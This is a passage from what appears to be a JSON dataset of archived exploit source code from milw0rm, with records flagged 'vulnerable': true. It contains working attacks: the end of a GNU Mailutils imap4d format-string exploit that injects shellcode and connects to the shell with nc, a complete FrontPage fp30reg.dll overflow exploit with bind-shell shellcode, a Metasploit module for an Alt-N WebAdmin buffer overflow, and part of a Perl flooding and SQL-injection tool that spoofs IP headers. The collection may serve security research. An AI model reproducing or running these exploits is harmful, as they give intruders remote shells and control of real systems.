\"\\x62\\x69\\x89\\xe3\\x52\\x53\\x89\\xe1\"\n\n\t    \"\\xb0\\x0b\\xcd\\x80\";\n\n\n\nchar b[1024];\n\nint i;\n\n\n\nint main(int ac, char **av){\n\n\tchar o, *host, *user, *pass;\n\n\tstruct hostent *h;\n\n\tstruct sockaddr_in s;\n\n\tint port, fd;\n\n\t\n\n\tputs(\"[+] GNU Mailutils 0.6 imap4d 'search' format string exploit.\");\n\n\tputs(\"[+] By clem1.\");\n\n\n\n\tif(ac != 9) usage(av[0]);\n\n\t\n\n\twhile((o = getopt(ac,av,\"h:p:u:s:\")) != EOF) {\n\n\t\tswitch (o) {\n\n\t\t\tcase 'h':\n\n\t\t\t\thost = optarg;\n\n\t\t\t\tbreak;\n\n\t\t\tcase 'p':\n\n\t\t\t\tport = atoi(optarg);\n\n\t\t\t\tbreak;\n\n\t\t\tcase 'u':\n\n\t\t\t\tuser = optarg;\n\n\t\t\t\tbreak;\n\n\t\t\tcase 's':\n\n\t\t\t\tpass = optarg;\n\n\t\t\t\tbreak;\n\n\t\t\tdefault:\n\n\t\t\t\tusage(av[0]);\n\n\t\t\t\tbreak;\n\n\t\t}\n\n\t}\n\n\tif((h = gethostbyname(host)) == NULL) {\n\n\t\therror(\"[-] gethostbyname()\");\n\n\t\texit(1);\n\n        }\n\n\t\n\n\tprintf(\"[+] connecting to: %s:%d\\n\", inet_ntoa(*((struct in_addr *)h->h_addr)), port);\n\n\n\n\tfd = socket(AF_INET, SOCK_STREAM, 0);\n\n\tif(fd == -1){\n\n\t\tperror(\"[-] socket()\");\n\n\t\texit(1);\n\n\t}\n\n\n\n\ts.sin_family = AF_INET;\n\n\ts.sin_port = htons(port);\n\n\ts.sin_addr = *((struct in_addr *)h->h_addr);\n\n\tbzero(&(s.sin_zero), 8);\n\n\n\n\tif (connect(fd, (struct sockaddr *)&s, sizeof s) == -1) {\n\n\t\tperror(\"[-] connect()\");\n\n\t\texit(1);\n\n\t}\n\n\n\n\ti = recv(fd, b, 1023, 0);\n\n\tb[i] = 0;\n\n\tif(strstr(b, \"IMAP4rev1\") == NULL){\n\n\t\tputs(\"[-] failled.\");\n\n\t\texit(1);\n\n\t}\n\n\t/* authentification. */\n\n\tauth(fd, user, pass);\n\n\t/* build and send evil format string. */\n\n\tfmtbuild(fd);\n\n\t/* store shellcode in imap4d rwx adresse space. */\n\n\tsendsc(fd);\n\n\t/* force a call to fclose, uhm no shellcode ;> */\n\n\towned(fd, host);\n\n\treturn 0;\n\n}\n\n\n\nvoid auth(int fd, char *user, char *pass){\n\n\tmemset(b, 0x0, 1024);\n\n\tsnprintf(b, 1023, \"1 LOGIN \\\"%s\\\" \\\"%s\\\"\\n\", user, pass);\n\n\tif(send(fd, b, strlen(b), 0) == -1){\n\n\t\tperror(\"[-] send()\");\n\n\t\texit(1);\n\n\t}\n\n\tmemset(b, 0x0, 1024);\n\n\ti = recv(fd, b, 1023, 0);\n\n\tb[i] = 0x0;\n\n\tif(strstr(b, \"Completed\") == NULL){\n\n\t\tputs(\"[-] LOGIN failled.\");\n\n\t\texit(1);\n\n\t}\n\n\tmemset(b, 0x0, 1024);\n\n\tsnprintf(b, 1023, \"2 SELECT \\\"%s\\\"\\n\", v.mailbox);\n\n\tif(send(fd, b, strlen(b), 0) == -1){\n\n\t\tperror(\"[-] send()\");\n\n\t\texit(1);\n\n\t}\n\n\tmemset(b, 0x0, 1024);\n\n\twhile((i = recv(fd, b, 1023, 0)) != -1){\n\n\t\tb[i] = 0x0;\n\n\t\tif(strstr(b, \"Completed\") != NULL)\n\n\t\t\tbreak;\n\n\t\tif(strstr(b, \"Couldn't\") != NULL){\n\n\t\t\tputs(\"[-] SELECT failled.\");\n\n\t\t\texit(1);\n\n\t\t}\n\n\t}\n\n\tputs(\"[+] authentification: completed.\");\n\n\treturn;\n\n}\n\n\n\nvoid sendsc(int fd){\n\n\tmemset(b, 0x41, 1024);\n\n\tmemcpy(b + 900, sc, strlen(sc));\n\n\tmemcpy(b + 1020, \" A\\n\", 3);\n\n\tmemcpy(b, \"3 LIST \", 7);\n\n\tif(send(fd, b, strlen(b), 0) == -1){\n\n\t\tperror(\"[-] send()\");\n\n\t\texit(1);\n\n\t}\n\n\tmemset(b, 0x0, 1024);\n\n\twhile((i = recv(fd, b, 1023, 0)) != -1){\n\n\t\tb[i] = 0x0;\n\n\t\tif(strstr(b, \"Completed\") != NULL)\n\n\t\t\tbreak;\n\n\t\tif(strstr(b, \"BAD\") != NULL){\n\n\t\t\tputs(\"[-] LIST failled.\");\n\n\t\t\texit(1);\n\n\t\t}\n\n\t}\n\n\tputs(\"[+] shellcode sended.\");\n\n\treturn;\n\n}\n\n\n\nvoid fmtbuild(int fd){\n\n\tunsigned char b0, b1, b2, b3;\n\n\tint a1, a2;\n\n\ta1 = (v.addr & 0xffff0000) >> 16;\n\n\ta2 = (v.addr & 0x0000ffff);\n\n\tb0 = (v.IO_file_close >> 24) & 0xff;\n\n\tb1 = (v.IO_file_close >> 16) & 0xff;\n\n\tb2 = (v.IO_file_close >> 8) & 0xff;\n\n\tb3 = (v.IO_file_close) & 0xff;\n\n\tsnprintf(b, sizeof b,     \"3 SEARCH TOPIC \"\n\n\t\t\t\t  \"A\" /* pad. */\n\n\t\t\t\t  \"%c%c%c%c\" \n\n\t\t\t\t  \"%%.%hdx\"\n\n\t\t\t\t  \"%%%d$hn\\n\",\n\n\t\t\t\t  b3 + 2, b2, b1, b0,\n\n\t\t\t\t  a1 - 0x24,\n\n\t\t\t\t  v.offset);\n\n\tif(send(fd, b, strlen(b), 0) == -1){\n\n\t\tperror(\"[-] send()\");\n\n\t\texit(1);\n\n\t}\n\n\twhile((i = recv(fd, b, 1023, 0)) != -1){\n\n\t\tb[i] = 0x0;\n\n\t\tif(strstr(b, \"BAD\") != NULL)\n\n\t\t\tbreak;\n\n\t}\n\n\tmemset(b, 0x0, 1024);\n\n\tsnprintf(b, sizeof b,     \"3 SEARCH TOPIC \"\n\n\t\t\t\t  \"A\" /* pad. */\n\n\t\t\t\t  \"%c%c%c%c\" \n\n\t\t\t\t  \"%%.%hdx\"\n\n\t\t\t\t  \"%%%d$hn\\n\",\n\n\t\t\t\t  b3, b2, b1, b0,\n\n\t\t\t\t  a2 - 0x24,\n\n\t\t\t\t  v.offset);\n\n\tif(send(fd, b, strlen(b), 0) == -1){\n\n\t\tperror(\"[-] send()\");\n\n\t\texit(1);\n\n\t}\n\n\twhile((i = recv(fd, b, 1023, 0)) != -1){\n\n\t\tb[i] = 0x0;\n\n\t\tif(strstr(b, \"BAD\") != NULL)\n\n\t\t\tbreak;\n\n\t}\n\n\tputs(\"[+] format string: sended\");\n\n\treturn;\n\n}\n\n\n\nvoid owned(int fd, char *host){\n\n\tmemset(b, 0x0, 1024);\n\n\tsnprintf(b, 1023, \"3 SUBSCRIBE OWNED\\n\");\n\n\tif(send(fd, b, strlen(b), 0) == -1){\n\n\t\tperror(\"[-] send()\");\n\n\t\texit(1);\n\n\t}\n\n\tputs(\"[+] Bingo.\\n\");\n\n\tsleep(1);\n\n\texecl(\"/bin/nc\", \"prout\", host, \"5074\", NULL);\n\n\tprintf(\"[-] muh? where is nc?\\n[+] A shell is waiting you on %s:5074.\\n\", host);\n\n\treturn;\t\n\n}\n\n\n\nvoid usage(char *ex){\n\n\tprintf(\"usage: %s -h <hostname> -p <port> -u <user> -s <password>\\n\", ex);\n\n\texit(1);\n\n}\n\n\n\n// milw0rm.com [2005-09-10]",
1085        "vulnerable": true
1086    },
1087    {
1088        "exploit_id": 121,
1089        "content": "/*******************************************************************************\n\n\n\nFrontpage fp30reg.dll Overflow (MS03-051) discovered by Brett Moore\n\n\n\nExploit by Adik netmaniac hotmail kg\n\n\n\nBinds persistent command shell on port 9999\n\nTested on \t\t\t\n\n\t\tWindows 2000 Professional SP3 English version \n\n\t\t(fp30reg.dll ver 4.0.2.5526)\t\t\t\n\n\n\n-[ 13/Nov/2003 ]-\n\n********************************************************************************/\n\n\n\n\n\n#include <stdio.h>\n\n#include <string.h>\n\n#include <winsock.h>\n\n#pragma comment(lib,\"ws2_32\")\n\n\n\n#define VER\t\t\"0.1\"\t\n\n\n\n/******** bind shellcode spawns persistent shell on port 9999 *****************************/\n\nunsigned char kyrgyz_bind_code[] = {\n\n\t0xEB, 0x03, 0x5D, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x8B, 0xC5, 0x83, 0xC0, 0x11, 0x33,\n\n\t0xC9, 0x66, 0xB9, 0xC9, 0x01, 0x80, 0x30, 0x88, 0x40, 0xE2, 0xFA,\n\n\t0xDD, 0x03, 0x64, 0x03, 0x7C, 0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88, \n\n\t0x01, 0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88, \n\n\t0x01, 0xCE, 0x4E, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE, \n\n\t0x4E, 0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88, \n\n\t0x88, 0x01, 0xCE, 0x5A, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88, \n\n\t0x88, 0x01, 0xCE, 0x46, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88, \n\n\t0x88, 0x01, 0xCE, 0x42, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88, \n\n\t0x88, 0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88, \n\n\t0x88, 0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88, \n\n\t0x88, 0x01, 0xCE, 0x64, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88, \n\n\t0x88, 0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88, \n\n\t0x88, 0x01, 0xCE, 0x6A, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88, \n\n\t0x88, 0x01, 0xCE, 0x5E, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89, \n\n\t0x88, 0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78, \n\n\t0x03, 0x50, 0xDF, 0xDF, 0xE0, 0x8A, 0x88, 0xAF, 0x87, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77, \n\n\t0xDE, 0x64, 0xDF, 0xDB, 0x77, 0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03, \n\n\t0x58, 0x01, 0xCE, 0x36, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05, \n\n\t0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98, \n\n\t0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC, \n\n\t0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77, \n\n\t0xFE, 0x4A, 0xD9, 0x77, 0xDE, 0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03, \n\n\t0x40, 0x77, 0xFE, 0x36, 0x77, 0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8, \n\n\t0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C, \n\n\t0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0, \n\n\t0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03, \n\n\t0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B, \n\n\t0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03, \n\n\t0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48, \n\n\t0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 0x8C, 0x88\n\n};\n\n\n\nvoid cmdshell (int sock);\n\nlong gimmeip(char *hostname);\n\n\n\nint main(int argc,char *argv[])\n\n{     \n\n\t\tWSADATA wsaData;\n\n\t\tstruct sockaddr_in targetTCP;\n\n\t\tstruct hostent *host;\n\n\t\tint sockTCP,s;\n\n\t\tunsigned short port = 80;\n\n\t\tlong ip;\n\n\t\tunsigned char header[]=\t\"POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\\r\\n\";\n\n                                unsigned char packet[3000],data[1500];\t\t                \n\n\t\tunsigned char ecx[] = \"\\xe0\\xf3\\xd4\\x67\";\n\n\t\tunsigned char edi[] = \"\\xff\\xd0\\x90\\x90\";\t\t\n\n\t\tunsigned char call[] = \"\\xe4\\xf3\\xd4\\x67\";//overwrite .data section of fp30reg.dll\n\n\t\tunsigned char shortjmp[] = \"\\xeb\\x10\";\n\n\t\t\n\n\t\tprintf(\"\\n-={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver %s }=-\\n\\n\"\n\n\t\t\" by Adik < netmaniac [at] hotmail.KG >\\n\\n\", VER);\n\n\t\tif(argc < 2)\n\n\t\t{\n\n\t\t\t\n\n\t\t\tprintf(\" Usage: %s [Target] <port>\\n\"\n\n\t\t\t\t\t\" eg: fp30reg.exe 192.168.63.130\\n\\n\",argv[0]);\n\n\t\t\treturn 1;\t\t\t\n\n\t\t}\t\t\n\n\t\tif(argc==3)\n\n\t\t\tport = atoi(argv[2]);\t\t\t\t\t\n\n        WSAStartup(0x0202, &wsaData);\t\t\t\t\n\n\t\tprintf(\"[*] Target:\\t%s \\tPort: %d\\n\\n\",argv[1],port);\n\n\t\tip=gimmeip(argv[1]);\t\n\n        memset(&targetTCP, 0, sizeof(targetTCP));\n\n\t\tmemset(packet,0,sizeof(packet));\n\n        targetTCP.sin_family = AF_INET;\n\n        targetTCP.sin_addr.s_addr = ip;\n\n        targetTCP.sin_port = htons(port);\t\t\t\t\n\n\tsprintf(packet,\"%sHost: %s\\r\\nTransfer-Encoding: chunked\\r\\n\",header,argv[1]);\t\t\n\n\tmemset(data, 0x90, sizeof(data)-1);\n\n\tdata[sizeof(data)-1] = '\\x0';\n\n\tmemcpy(&data[16],edi,sizeof(edi)-1);\n\n\tmemcpy(&data[20],ecx,sizeof(ecx)-1);\t\t\n\n\tmemcpy(&data[250+10],shortjmp,sizeof(shortjmp)-1);\n\n\tmemcpy(&data[250+14],call,sizeof(call)-1);\t\t\n\n\tmemcpy(&data[250+70],kyrgyz_bind_code,sizeof(kyrgyz_bind_code));\n\n\tsprintf(packet,\"%sContent-Length: %d\\r\\n\\r\\n%x\\r\\n%s\\r\\n0\\r\\n\\r\\n\",packet,strlen(data),strlen(data),data);\n\n        if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)\n\n\t\t{\n\n\t\t\t\tprintf(\"[x] Socket not initialized! Exiting...\\n\");\n\n\t\t\t\tWSACleanup();\n\n                return 1;\n\n\t\t}\n\n\t\tprintf(\"[*] Socket initialized...\\n\");\t\t\t\t\t\n\n\t\tif(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)\n\n\t\t{\n\n\t\t\tprintf(\"[*] Connection to host failed! Exiting...\\n\");\n\n\t\t\tWSACleanup();\n\n\t\t\texit(1);\n\n\t\t} \t\t\n\n\t\tprintf(\"[*] Checking for presence of fp30reg.dll...\");\n\n\t\tif (send(sockTCP, packet, strlen(packet),0) == -1)\n\n\t\t{\n\n\t\t\t\tprintf(\"[x] Failed to inject packet! Exiting...\\n\");\n\n\t\t\t\tWSACleanup();\n\n                return 1;\n\n\t\t}\t\t\n\n\t\tmemset(packet,0,sizeof(packet));\t\n\n\t\tif (recv(sockTCP, packet, sizeof(packet),0) == -1)\t\t\n\n\t\t{\n\n\t\t\t\tprintf(\"[x] Failed to receive packet! Exiting...\\n\");\n\n\t\t\t\tWSACleanup();\n\n                return 1;\n\n\t\t}\t\t\t\t\n\n\t\tif(packet[9]=='1' && packet[10]=='0' && packet[11]=='0')\n\n\t\t\tprintf(\" Found!\\n\");\n\n\t\telse\n\n\t\t{\n\n\t\t\tprintf(\" Not Found!! Exiting...\\n\");\n\n\t\t\tWSACleanup();\n\n\t\t\treturn 1;\n\n\t\t}\n\n\t\tprintf(\"[*] Packet injected!\\n\");\n\n\t\tclosesocket(sockTCP);\n\n\t\tprintf(\"[*] Sleeping \");\n\n\t\tfor(s=0;s<13000;s+=1000)\n\n\t\t{\n\n\t\t\tprintf(\". \");\n\n\t\t\tSleep(1000);\n\n\t\t}\t\t\n\n\t\tprintf(\"\\n[*] Connecting to host: %s on port 9999\",argv[1]);\n\n\t\tif ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)\n\n\t\t{\n\n\t\t\t\tprintf(\"\\n[x] Socket not initialized! Exiting...\\n\");\n\n\t\t\t\tWSACleanup();\n\n                return 1;\n\n\t\t}\t\t\n\n\t\ttargetTCP.sin_family = AF_INET;\n\n        targetTCP.sin_addr.s_addr = ip;\n\n        targetTCP.sin_port = htons(9999);\n\n\t\tif(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)\n\n\t\t{\n\n\t\t\tprintf(\"\\n[x] Exploit failed or there is a Firewall! Exiting...\\n\");\n\n\t\t\tWSACleanup();\n\n\t\t\texit(1);\n\n\t\t} \n\n\t\tprintf(\"\\n[*] Dropping to shell...\\n\\n\");\n\n\t\tcmdshell(sockTCP);\n\n        return 0;\n\n}\n\n/*********************************************************************************/\n\nvoid cmdshell (int sock)\n\n{\n\n struct timeval tv;\n\n int length;\n\n unsigned long o[2];\n\n char buffer[1000];\n\n \n\n tv.tv_sec = 1;\n\n tv.tv_usec = 0;\n\n\n\n while (1) \n\n {\n\n\to[0] = 1;\n\n\to[1] = sock;\t\n\n\n\n\tlength = select (0, (fd_set *)&o, NULL, NULL, &tv);\n\n\tif(length == 1)\n\n\t{\n\n\t\tlength = recv (sock, buffer, sizeof (buffer), 0);\n\n\t\tif (length <= 0) \n\n\t\t{\n\n\t\t\tprintf (\"[x] Connection closed.\\n\");\n\n\t\t\tWSACleanup();\n\n\t\t\treturn;\n\n\t\t}\n\n\t\tlength = write (1, buffer, length);\n\n\t\tif (length <= 0) \n\n\t\t{\n\n\t\t\tprintf (\"[x] Connection closed.\\n\");\n\n\t\t\tWSACleanup();\n\n\t\t\treturn;\n\n\t\t}\n\n\t}\n\n\telse\n\n\t{\n\n\t\tlength = read (0, buffer, sizeof (buffer));\n\n\t\tif (length <= 0) \n\n\t\t{\n\n\t\t\tprintf(\"[x] Connection closed.\\n\");\n\n\t\t\tWSACleanup();\n\n\t\t\treturn;\n\n\t\t}\n\n\t\tlength = send(sock, buffer, length, 0);\n\n\t\tif (length <= 0) \n\n\t\t{\n\n\t\t\tprintf(\"[x] Connection closed.\\n\");\n\n\t\t\tWSACleanup();\n\n\t\t\treturn;\n\n\t\t}\n\n\t}\n\n}\n\n\n\n}\n\n/*********************************************************************************/\n\nlong gimmeip(char *hostname) \n\n{\n\n\tstruct hostent *he;\n\n\tlong ipaddr;\n\n\t\n\n\tif ((ipaddr = inet_addr(hostname)) < 0) \n\n\t{\n\n\t\tif ((he = gethostbyname(hostname)) == NULL) \n\n\t\t{\n\n\t\t\tprintf(\"[x] Failed to resolve host: %s! Exiting...\\n\\n\",hostname);\n\n\t\t\tWSACleanup();\n\n\t\t\texit(1);\n\n\t\t}\n\n\t\tmemcpy(&ipaddr, he->h_addr, he->h_length);\n\n\t}\t\n\n\treturn ipaddr;\n\n}\n\n/*********************************************************************************/\n\n\n\n// milw0rm.com [2003-11-13]",
1090        "vulnerable": true
1091    },
1092    {
1093        "exploit_id": 1210,
1094        "content": "##\n\n# This file is part of the Metasploit Framework and may be redistributed\n\n# according to the licenses defined in the Authors field below. In the\n\n# case of an unknown or missing license, this file defaults to the same\n\n# license as the core Framework (dual GPLv2 and Artistic). The latest\n\n# version of the Framework can always be obtained from metasploit.com.\n\n##\n\n\n\npackage Msf::Exploit::altn_webadmin;\n\nuse base \"Msf::Exploit\";\n\nuse strict;\n\nuse Pex::Text;\n\n\n\nmy $advanced = { };\n\n\n\nmy $info =\n\n  {\n\n\n\n\t'Name'  => 'Alt-N WebAdmin USER Buffer Overflow',\n\n\t'Version'  => '$Revision: 1.1 $',\n\n\t'Authors' => [ 'y0 [at] w00t-shell.net', ],\n\n\t'Arch'  => [ 'x86' ],\n\n\t'OS'    => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003' ],\n\n\t'Priv'  => 0,\n\n\t\n\n\t'AutoOpts'  => { 'EXITFUNC' => 'thread' },\n\n\t'UserOpts'  => {\n\n\t\t'RHOST' => [1, 'ADDR', 'The target address'],\n\n\t\t'RPORT' => [1, 'PORT', 'The target port', 1000],\n\n\t\t'SSL'   => [0, 'BOOL', 'Use SSL'],\n\n\t  },\n\n\t  \n\n\t\n\n\n\n\t'Payload' =>\n\n\t  {\n\n\t\t'Space'     => 830,\n\n\t\t'BadChars'  => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\",\n\n\t\t'Prepend'   => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",\n\n\t\t'Keys'      => ['+ws2ord'],\n\n\t  },\n\n\n\n\t'Description'  => Pex::Text::Freeform(qq{\n\nAlt-N WebAdmin is prone to a buffer overflow condition. \n\nThis is due to insufficient bounds checking on the USER \n\nparameter. Successful exploitation could result in code \n\nexecution with SYSTEM level privileges.\n\n}),\n\n\n\n\t'Refs'  =>\n\n\t  [\n\n\t\t['BID', '8024'],\n\n\t\t['NSS', '11771'],\n\n\t  ],\n\n\t  \n\n\t'Targets' =>\n\n\t  [\n\n\t\t['WebAdmin 2.0.4 Universal', 0x10074d9b], # 2.0.4 webAdmin.dll\n\n\t\t['WebAdmin 2.0.3 Universal', 0x10074b13], # 2.0.3 webAdmin.dll\n\n\t\t['WebAdmin 2.0.2 Universal', 0x10071e3b], # 2.0.2 webAdmin.dll\n\n\t\t['WebAdmin 2.0.1 Universal', 0x100543c2], # 2.0.1 webAdmin.dll\n\n\n\n\t  ],\n\n\t'Keys' => ['webadmin'],\n\n  };\n\n\n\nsub new {\n\n\tmy $class = shift;\n\n\tmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\n\n\treturn($self);\n\n}\n\n\n\nsub Check {\n\n\tmy ($self) = @_;\n\n\tmy $target_host = $self->GetVar('RHOST');\n\n\tmy $target_port = $self->GetVar('RPORT');\n\n\n\n\tmy $s = Msf::Socket::Tcp->new\n\n\t  (\n\n\t\t'PeerAddr'  => $target_host,\n\n\t\t'PeerPort'  => $target_port,\n\n\t\t'LocalPort' => $self->GetVar('CPORT'),\n\n\t\t'SSL'       => $self->GetVar('SSL'),\n\n\t  );\n\n\tif ($s->IsError) {\n\n\t\t$self->PrintLine('[*] Error creating socket: ' . $s->GetError);\n\n\t\treturn $self->CheckCode('Connect');\n\n\t}\n\n\n\n\t$s->Send(\"GET / HTTP/1.0\\r\\n\\r\\n\");\n\n\tmy $res = $s->Recv(-1, 20);\n\n\t$s->Close();\n\n\n\n\tif ($res !~ /v2\\.0\\.4|v2\\.0\\.3|v2\\.0\\.2|v2\\.0\\.1/) {\n\n\t\t$self->PrintLine(\"[*] This server does not appear to be vulnerable.\");\n\n\t\treturn $self->CheckCode('Safe');\n\n\t}\n\n\n\n\t$self->PrintLine(\"[*] Vulnerable installation detected :-)\");\n\n\treturn $self->CheckCode('Detected');\n\n}\n\n\n\nsub Exploit\n\n{\n\n\tmy $self = shift;\n\n\tmy $target_host = $self->GetVar('RHOST');\n\n\tmy $target_port = $self->GetVar('RPORT');\n\n\tmy $target_idx  = $self->GetVar('TARGET');\n\n\tmy $shellcode   = $self->GetVar('EncodedPayload')->Payload;\n\n\tmy $target = $self->Targets->[$target_idx];\n\n\n\n\tif (! $self->InitNops(128)) {\n\n\t\t$self->PrintLine(\"[*] Failed to initialize the nop module.\");\n\n\t\treturn;\n\n\t}\n\n\n\n\tmy $splat = Pex::Text::AlphaNumText(168);\n\n\n\n\tmy $credz =\n\n\t  \"User=\". $splat. pack('V', $target->[1]). $shellcode.\n\n\t  \"&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In\\r\\n\";\n\n\n\n\tmy $sploit =\n\n\t  \"POST /WebAdmin.DLL?View=Logon HTTP/1.1\\r\\n\".\n\n\t  \"Content-Type: application/x-www-form-urlencoded\\r\\n\".\n\n\t  \"Connection: close\\r\\n\".\n\n\t  \"Cookie: User=y0; Lang=en; Theme=standard\\r\\n\".\n\n\t  \"User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.31-grsec i686)\\r\\n\".\n\n\t  \"Host: $target_host\\r\\n\".\n\n\t  \"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png\\r\\n\".\n\n\t  \"Accept-Language: en\\r\\n\".\n\n\t  \"Accept-Charset: iso-8859-1,*,utf-8\\r\\n\".\n\n\t  \"Content-Length: \". length($credz). \"\\r\\n\\r\\n\".\n\n\t  $credz;\n\n\n\n\t$self->PrintLine(sprintf(\"[*] Trying to exploit target %s 0x%.8x\", $target->[0], $target->[1]));\n\n\n\n\tmy $s = Msf::Socket::Tcp->new\n\n\t  (\n\n\t\t'PeerAddr'  => $target_host,\n\n\t\t'PeerPort'  => $target_port,\n\n\t\t'LocalPort' => $self->GetVar('CPORT'),\n\n\t\t'SSL'       => $self->GetVar('SSL'),\n\n\t  );\n\n\tif ($s->IsError) {\n\n\t\t$self->PrintLine('[*] Error creating socket: ' . $s->GetError);\n\n\t\treturn;\n\n\t}\n\n\n\n\t$s->Send($sploit);\n\n\t$self->Handler($s);\n\n\t$s->Close();\n\n\treturn;\n\n}\n\n\n\n# milw0rm.com [2005-09-11]",
1095        "vulnerable": true
1096    },
1097    {
1098        "exploit_id": 1211,
1099        "content": "#!/usr/bin/perl\n\n##  PhpTagCool Zatueritor 1.0\n\n##  Copyright: Megabyte www.mbytesecurity.org\n\n##  Greetz: Rootbox for discovering the forwarded-for issue\n\n##  Te amo Pandora\n\n##  Crashcool,fuiste defaceado por un bug de tu propia programacion,ahora que inventaras?\n\n \n\nuse IO::Socket;\n\n \n\n$x = 0;\n\n \n\nprint q(\n\nPhpTagCool Zatueritor 1.0\n\nby Megabyte\n\n \n\n);\n\nprint q(Host |sin http://www.| );\n\n$host = <STDIN>;\n\nchop ($host);\n\n \n\nprint q(Ruta |ejemplo. /phptagcool/ o /| );\n\n$pth = <STDIN>;\n\nchop ($pth);\n\n \n\nprint q(Tipo de Atake |1 = Posteo Masivo, 2 = Injeccion SQL| );\n\n$type = <STDIN>;\n\nchop ($type);\n\n \n\n## The Flood Attack\n\nif($type == 1){\n\n \n\n \n\nwhile($x != 255)\n\n{\n\n \n\n \n\n$nick = \"nick=megabyte\";\n\n \n\n## We generate our own ip address so we won't be banned  :) \n\n$ip = \"127.0.0\" . \"$x\";\n\n \n\n \n\n$postit = \"$nick\".\"&url=http%3A%2F%2Fwww.mbytesecurity.org&mensaje=FloodingLam\n\neTag&Submit=Enviar\";\n\n \n\n \n\n$lrg = length $postit;\n\n \n\n \n\nmy $sock = new IO::Socket::INET (\n\n                                 PeerAddr => \"$host\",\n\n                                 PeerPort => \"80\",\n\n                                 Proto => \"tcp\",\n\n                                );\n\ndie \"\\nNo se pudo conectar  :(  $!\\n\" unless $sock;\n\n \n\n## We Fake the X-Forwarded-For header,so we can post with multiple ip's\n\nprint $sock \"POST $pth\".\"mensajes.php HTTP/1.1\\n\";\n\nprint $sock \"Host: $host\\n\";\n\nprint $sock \"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwav\n\ne-flash, 